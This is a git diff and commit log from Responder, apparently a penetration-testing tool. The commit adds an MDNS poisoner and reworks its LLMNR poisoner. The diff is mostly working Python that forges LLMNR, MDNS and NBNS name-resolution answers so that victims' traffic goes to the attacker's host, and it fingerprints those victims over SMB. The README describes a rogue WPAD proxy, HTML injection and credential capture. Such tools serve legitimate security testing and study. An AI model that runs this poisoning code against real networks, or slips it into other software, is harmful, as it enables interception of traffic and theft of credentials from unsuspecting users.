Added: MDNS Poisoner

fix: Bind to interface bug.
minor fix
2025-12-06 20:51:31 +00:00 · 2014-03-22 03:10:06 -04:00 · 2014-03-20 22:37:10 -04:00 · 2014-03-19 22:17:58 -04:00 · 2014-02-19 19:35:35 -05:00 · 2014-02-19 19:29:29 -05:00
2 changed files with 237 additions and 127 deletions
--- a/README.md
+++ b/README.md
@@ -86,6 +86,8 @@ FEATURES
 - WPAD rogue transparent proxy server. This module will capture all HTTP requests from anyone launching Internet Explorer on the network. This module is higly effective. You can now send your custom Pac script to a victim and inject HTML into the server's responses. See Responder.conf. This module is now enabled by default.
 - Analyze mode: This module allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning any requests. Also, you can map domains, MSSQL servers, workstations passively, see if ICMP Redirects attacks are plausible on your subnet. 
 - Responder is now using a configuration file. See Responder.conf.
 - Built-in POP3 auth server. This module will collect POP3 plaintext credentials
@@ -120,7 +122,7 @@ Running this tool:
 Usage Example:
-python Responder.py -i 10.20.30.40 -r On -I eth0
+python Responder.py -i 10.20.30.40 -r On -F On -w On
 Options List:
@@ -145,7 +147,7 @@ Options List:
                                     host that issued an NBT-NS or LLMNR query.
 -w On, --wpad=On                     Set this to On or Off to start/stop the WPAD rogue
-                                     proxy server. Default value is On
+                                     proxy server. Default value is Off
 --lm=Off                             Set this to On if you want to force LM hashing
                                     downgrade for Windows XP/2003 and earlier. Default value is Off
@@ -154,6 +156,12 @@ Options List:
                                     wpad.dat file retrieval. This might cause a login prompt in
                                     some specific cases. Default value is Off
 -A, --analyze                        Analyze mode. This option allows you to see NBT-NS,BROWSER, 
                                     LLMNR requests from which workstation to which workstation 
                                     without poisoning any requests. Also, you can map domains, 
                                     MSSQL servers, workstations passively.
 -v                                   More verbose
@@ -162,6 +170,7 @@ For more information read these posts:
 http://blog.spiderlabs.com/2012/10/introducing-responder-10.html
 http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html
 http://blog.spiderlabs.com/2013/02/owning-windows-network-with-responder-part-2.html
 http://blog.spiderlabs.com/2014/02/responder-20-owning-windows-networks-part-3.html
 Follow our latest updates on twitter:
 https://twitter.com/PythonResponder
--- a/Responder.py
+++ b/Responder.py
@@ -134,7 +134,7 @@ logger2.addHandler(logging.FileHandler(Log2Filename,'w'))
 AnalyzeFilename = str(os.path.join(ResponderPATH,"Analyze-LLMNR-NBT-NS.log"))
 logger3 = logging.getLogger('Analyze LLMNR/NBT-NS')
-logger3.addHandler(logging.FileHandler(AnalyzeFilename,'w'))
+logger3.addHandler(logging.FileHandler(AnalyzeFilename,'a'))
 def Show_Help(ExtraHelpData):
   help = "NBT Name Service/LLMNR Responder 2.0.\nPlease send bugs/comments to: lgaffie@trustwave.com\nTo kill this script hit CRTL-C\n\n"
@@ -444,7 +444,7 @@ def RAPThisDomain(Client,Domain):
                 l.append('   -'+x)
          WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
          if WKST is not None:
-             l.append('[!]Workstation Server detected on Domain %s:'%(Domain))
+             l.append('[!]Workstations/Servers detected on Domain %s:'%(Domain))
             for x in WKST:
                 l.append('   -'+x)
          else:
@@ -484,7 +484,7 @@ def RapFinger(Host,Domain, Type):
             buffer1 = longueur(packet1)+packet1  
             s.send(buffer1)
             data = s.recv(1024)
-             ##Rap ServerEnum, domain forests and PDC
+             ##Rap ServerEnum.
             if data[8:10] == "\x75\x00":
                head = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x04\x00")
                t = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain))
@@ -492,8 +492,8 @@ def RapFinger(Host,Domain, Type):
                packet1 = str(head)+str(t)
                buffer1 = longueur(packet1)+packet1  
                s.send(buffer1)
-                data = s.recv(1024)
+                data = s.recv(64736)
-                ##Rap ServerEnum, SQL servers
+                ##Rap ServerEnum, Get answer and return what we're looking for.
                if data[8:10] == "\x25\x00":
                   s.close()
                   return ParsePacket(data)
@@ -858,8 +858,8 @@ class SMB1LM(BaseRequestHandler):
                 data = self.request.recv(1024)
        except Exception:
           pass #no need to print errors..
           self.request.close()
           pass #no need to print errors..
 ##################################################################################
 #SQL Stuff
@@ -1008,7 +1008,7 @@ class LLMNRAns(Packet):
        self.fields["AnswerNameLen"] = struct.pack(">h",len(self.fields["AnswerName"]))[1]
        self.fields["QuestionNameLen"] = struct.pack(">h",len(self.fields["QuestionName"]))[1]
-def Parse_LLMNR_Name(data,addr):
+def Parse_LLMNR_Name(data):
   NameLen = struct.unpack('>B',data[12])[0]
   Name = data[13:13+NameLen]
   return Name
@@ -1057,107 +1057,82 @@ def AnalyzeICMPRedirect():
 AnalyzeICMPRedirect()
-def RunLLMNR():
+# LLMNR Server class.
-   try:
+class LLMNR(BaseRequestHandler):
      ALL = '0.0.0.0'
      MADDR = "224.0.0.252"
      MPORT = 5355
      if IsOsX():
          print "OsX Bind to interface is not supported..Listening on all interfaces."
      if OsInterfaceIsSupported(INTERFACE):
         try:
            IP = FindLocalIP(BIND_TO_Interface)
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
            s.setsockopt(socket.SOL_SOCKET, 25, BIND_TO_Interface+'\0')
            s.bind((ALL,MPORT))
            s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
            s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
            Join = s.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,inet_aton(MADDR)+inet_aton(IP))
         except:
            print "Non existant network interface provided in Responder.conf, please provide a valid interface."
            sys.exit(1)
-      else:
+    def handle(self):
-         s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
+        data, soc = self.request
-         s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
+        try:
-         s.bind((ALL,MPORT))
+            if Analyze(AnalyzeMode):
-         s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
+               if data[2:4] == "\x00\x00":
-         Join = s.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,inet_aton(MADDR)+inet_aton(ALL))
+                  if Parse_IPV6_Addr(data):
-   except:
+                      Name = Parse_LLMNR_Name(data)
      raise
   while True:
       try:
          data, addr = s.recvfrom(1024)
          if Analyze(AnalyzeMode):
             if data[2:4] == "\x00\x00":
                if Parse_IPV6_Addr(data):
                    Name = Parse_LLMNR_Name(data,addr)
                    if Is_Finger_On(Finger_On_Off):
                       try:
                          Finger = RunSmbFinger((addr[0],445))
                          Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s.\nOs Version is: %s Client Version is: %s"%(addr[0], Name,Finger[0],Finger[1])
                          logger3.warning(Message)
                       except Exception:
                          Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(addr[0], Name)
                          logger3.warning(Message)
                       if PrintLLMNRNBTNS(AnalyzeFilename,Message):
                          print Message
                    else:
                       Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(addr[0], Name)
                       if PrintLLMNRNBTNS(AnalyzeFilename,Message):
                          print Message
                       logger3.warning(Message)
          if RespondToSpecificHost(RespondTo):
             if Analyze(AnalyzeMode) == False:
                if RespondToIPScope(RespondTo, addr[0]):
                   if data[2:4] == "\x00\x00":
                      if Parse_IPV6_Addr(data):
                         Name = Parse_LLMNR_Name(data,addr)
                         buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
                         buff.calculate()
                         for x in range(1):
                            s.sendto(str(buff), addr)
                         Message =  "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(addr[0],Name)
                         logging.warning(Message)
                         if PrintLLMNRNBTNS(Log2Filename,Message):
                            print Message
                            logger2.warning(Message)
                         if Is_Finger_On(Finger_On_Off):
                            try:
                               Finger = RunSmbFinger((addr[0],445))
                               print '[+] OsVersion is:%s'%(Finger[0])
                               print '[+] ClientVersion is :%s'%(Finger[1])
                               logging.warning('[+] OsVersion is:%s'%(Finger[0]))
                               logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
                            except Exception:
                               logging.warning('[+] Fingerprint failed for host: %s'%(addr[0]))
                               pass
          else:
             if data[2:4] == "\x00\x00":
                if Analyze(AnalyzeMode) == False:
                   if Parse_IPV6_Addr(data):
                      Name = Parse_LLMNR_Name(data,addr)
                      buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
                      buff.calculate()
                      Message =  "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(addr[0],Name)
                      for x in range(1):
                         s.sendto(str(buff), addr)
                      if PrintLLMNRNBTNS(Log2Filename,Message):
                         print Message
                         logger2.warning(Message)
                      if Is_Finger_On(Finger_On_Off):
                         try:
-                            Finger = RunSmbFinger((addr[0],445))
+                            Finger = RunSmbFinger((self.client_address[0],445))
-                            print '[+] OsVersion is:%s'%(Finger[0])
+                            Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,Finger[0],Finger[1])
-                            print '[+] ClientVersion is :%s'%(Finger[1])
+                            logger3.warning(Message)
                            logging.warning('[+] OsVersion is:%s'%(Finger[0]))
                            logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
                         except Exception:
-                            logging.warning('[+] Fingerprint failed for host: %s'%(addr[0]))
+                            Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name)
-                            pass
+                            logger3.warning(Message)
-       except:
+                         if PrintLLMNRNBTNS(AnalyzeFilename,Message):
-          raise
+                            print Message
                      else:
                         Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name)
                         if PrintLLMNRNBTNS(AnalyzeFilename,Message):
                            print Message
                         logger3.warning(Message)
            if RespondToSpecificHost(RespondTo):
               if Analyze(AnalyzeMode) == False:
                  if RespondToIPScope(RespondTo, self.client_address[0]):
                     if data[2:4] == "\x00\x00":
                        if Parse_IPV6_Addr(data):
                           Name = Parse_LLMNR_Name(data)
                           buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
                           buff.calculate()
                           for x in range(1):
                              soc.sendto(str(buff), self.client_address)
                           Message =  "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name)
                           logging.warning(Message)
                           if PrintLLMNRNBTNS(Log2Filename,Message):
                              print Message
                              logger2.warning(Message)
                           if Is_Finger_On(Finger_On_Off):
                              try:
                                 Finger = RunSmbFinger((self.client_address[0],445))
                                 print '[+] OsVersion is:%s'%(Finger[0])
                                 print '[+] ClientVersion is :%s'%(Finger[1])
                                 logging.warning('[+] OsVersion is:%s'%(Finger[0]))
                                 logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
                              except Exception:
                                 logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
                                 pass
            else:
               if data[2:4] == "\x00\x00":
                  if Analyze(AnalyzeMode) == False:
                     if Parse_IPV6_Addr(data):
                        Name = Parse_LLMNR_Name(data)
                        buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
                        buff.calculate()
                        Message =  "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name)
                        for x in range(1):
                           soc.sendto(str(buff), self.client_address)
                        if PrintLLMNRNBTNS(Log2Filename,Message):
                           print Message
                           logger2.warning(Message)
                        if Is_Finger_On(Finger_On_Off):
                           try:
                              Finger = RunSmbFinger((self.client_address[0],445))
                              print '[+] OsVersion is:%s'%(Finger[0])
                              print '[+] ClientVersion is :%s'%(Finger[1])
                              logging.warning('[+] OsVersion is:%s'%(Finger[0]))
                              logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
                           except Exception:
                              logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
                              pass
        except:
           raise
 ##################################################################################
 #DNS Stuff
@@ -1200,8 +1175,7 @@ class DNSAns(Packet):
 class DNS(BaseRequestHandler):
    def handle(self):
-        req, soc = self.request
+        data, soc = self.request
        data = req
        if self.client_address[0] == "127.0.0.1":
           pass
        elif ParseDNSType(data):
@@ -1228,6 +1202,71 @@ class DNSTCP(BaseRequestHandler):
        except Exception:
           pass
 ##################################################################################
 #MDNS Stuff
 ##################################################################################
 class MDNSAns(Packet):
    fields = OrderedDict([
        ("Tid",              "\x00\x00"),
        ("Flags",            "\x84\x00"),
        ("Question",         "\x00\x00"),
        ("AnswerRRS",        "\x00\x01"),
        ("AuthorityRRS",     "\x00\x00"),
        ("AdditionalRRS",    "\x00\x00"),   
        ("AnswerName",       ""),
        ("AnswerNameNull",   "\x00"),    
        ("Type",             "\x00\x01"),  
        ("Class",            "\x00\x01"),
        ("TTL",              "\x00\x00\x00\x78"),##Poison for 2mn.
        ("IPLen",            "\x00\x04"),
        ("IP",               "\x00\x00\x00\x00"),
    ])
    def calculate(self):
        self.fields["IP"] = inet_aton(OURIP)
        self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
 def Parse_MDNS_Name(data):
   data = data[12:]
   NameLen = struct.unpack('>B',data[0])[0]
   Name = data[1:1+NameLen]
   NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
   Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
   return Name+'.'+Name_
 def Poisoned_MDNS_Name(data):
   data = data[12:]
   Name = data[:len(data)-5]
   return Name
 class MDNS(BaseRequestHandler):
    def handle(self):
       MADDR = "224.0.0.251"
       MPORT = 5353
       data, soc = self.request
       if self.client_address[0] == "127.0.0.1":
          pass
       try:
         if Analyze(AnalyzeMode):
            if Parse_IPV6_Addr(data):
               print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data))
               logging.warning('[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
         if Analyze(AnalyzeMode) == False:
            if Parse_IPV6_Addr(data):
               print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))
               logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
               Name = Poisoned_MDNS_Name(data)
               MDns = MDNSAns(AnswerName = Name)
               MDns.calculate()
               soc.sendto(str(MDns),(MADDR,MPORT))
         else:
            pass
       except Exception:
         raise
 ##################################################################################
 #HTTP Stuff
 ##################################################################################
@@ -1498,7 +1537,7 @@ def InjectData(data):
             return Gzip
          else:
             return data
-       if "Content-Type: text/html" in Headers:
+       if "content-type: text/html" in Headers.lower():
          Len = ''.join(re.findall('(?<=Content-Length: )[^\r\n]*', Headers))
          HasHTML = re.findall('(?<=<html)[^<]*', Content)
          if HasHTML :
@@ -2103,30 +2142,89 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
              pass
        TCPServer.server_bind(self)
 class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
    def server_bind(self):
       MADDR = "224.0.0.251"
       self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
       self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
       Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,inet_aton(MADDR)+inet_aton(OURIP))
       if OsInterfaceIsSupported(INTERFACE):
          try:
             self.socket.setsockopt(socket.SOL_SOCKET, 25, BIND_TO_Interface+'\0')
          except:
             pass
       UDPServer.server_bind(self)
 class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
    def server_bind(self):
       MADDR = "224.0.0.252"
       self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
       self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
       Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,inet_aton(MADDR)+inet_aton(OURIP))
       if OsInterfaceIsSupported(INTERFACE):
          try:
             self.socket.setsockopt(socket.SOL_SOCKET, 25, BIND_TO_Interface+'\0')
          except:
             pass
       UDPServer.server_bind(self)
 ThreadingUDPServer.allow_reuse_address = 1
 ThreadingUDPMDNSServer.allow_reuse_address = 1
 ThreadingUDPLLMNRServer.allow_reuse_address = 1
 ThreadingTCPServer.allow_reuse_address = 1
 def serve_thread_udp(host, port, handler):
-	try:
+   try:
-		server = ThreadingUDPServer((host, port), handler)
+      if OsInterfaceIsSupported(INTERFACE):
-		server.serve_forever()
+         IP = FindLocalIP(BIND_TO_Interface)
-	except:
+         server = ThreadingUDPServer((IP, port), handler)
-		print "Error starting UDP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
+         server.serve_forever()
- 
+      else:
         server = ThreadingUDPServer((host, port), handler)
         server.serve_forever()
   except:
      print "Error starting UDP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
 def serve_thread_udp_MDNS(host, port, handler):
   try:
      server = ThreadingUDPMDNSServer((host, port), handler)
      server.serve_forever()
   except:
      print "Error starting UDP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
 def serve_thread_udp_LLMNR(host, port, handler):
   try:
      server = ThreadingUDPLLMNRServer((host, port), handler)
      server.serve_forever()
   except:
      print "Error starting UDP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
 def serve_thread_tcp(host, port, handler):
-	try:
+   try:
-		server = ThreadingTCPServer((host, port), handler)
+      if OsInterfaceIsSupported(INTERFACE):
-		server.serve_forever()
+         IP = FindLocalIP(BIND_TO_Interface)
-	except:
+         server = ThreadingTCPServer((IP, port), handler)
-		print "Error starting TCP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
+         server.serve_forever()
      else:
         server = ThreadingTCPServer((host, port), handler)
         server.serve_forever()
   except:
      print "Error starting TCP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
 def serve_thread_SSL(host, port, handler):
-	try:
+   try:
-		server = SSlSock((host, port), handler)
+      if OsInterfaceIsSupported(INTERFACE):
-		server.serve_forever()
+         IP = FindLocalIP(BIND_TO_Interface)
-	except:
+         server = SSlSock((IP, port), handler)
-		print "Error starting TCP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
+         server.serve_forever()
      else:
         server = SSlSock((host, port), handler)
         server.serve_forever()
   except:
      print "Error starting TCP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
 def main():
    try:
@@ -2144,8 +2242,9 @@ def main():
      #Browser listener loaded by default
      thread.start_new(serve_thread_udp,('', 138,Browser))
      ## Poisoner loaded by default, it's the purpose of this tool...
-      thread.start_new(serve_thread_udp,('', 137,NB))
+      thread.start_new(serve_thread_udp_MDNS,('', 5353,MDNS))   #MDNS
-      thread.start_new(RunLLMNR())
+      thread.start_new(serve_thread_udp,('', 137,NB))           #NBNS
      thread.start_new(serve_thread_udp_LLMNR,('', 5355, LLMNR)) #LLMNR
    except KeyboardInterrupt:
        exit()
@@ -2159,3 +2258,5 @@ if __name__ == '__main__':
Author	SHA1	Message	Date
lgandx	90479adcca	Added: MDNS Poisoner	2014-03-22 03:10:06 -04:00
lgandx	a1a4f46c7b	fix: Bind to interface bug.	2014-03-20 22:37:10 -04:00
lgandx	81b1f8f2c1	minor fix	2014-03-19 22:17:58 -04:00
lgandx	d0fc37fa42	minor change	2014-02-19 19:35:35 -05:00
lgandx	f5b21d992a	Merge branch 'master' of https://github.com/SpiderLabs/Responder merged with latest version	2014-02-19 19:29:29 -05:00
lgandx	2fdc74a089	minor fixes	2014-02-19 19:29:19 -05:00
lgandx	68eefb1e05	Reflected recent changes	2014-02-19 19:27:28 -05:00
lgandx	cff67bd4ba	Merge pull request #27 from mubix/patch-1 Case-insensitive content-type check	2014-02-10 16:58:02 -05:00
Rob Fuller	094824bfd3	Case-insensitive content-type check Was noticing that injection wasn't happening when the header was "Content-type" instead of the checked for "Content-Type". Headers could probably be put as .lower() from the beginning, but then again there might be header content that may break because of it.	2014-02-10 16:55:11 -05:00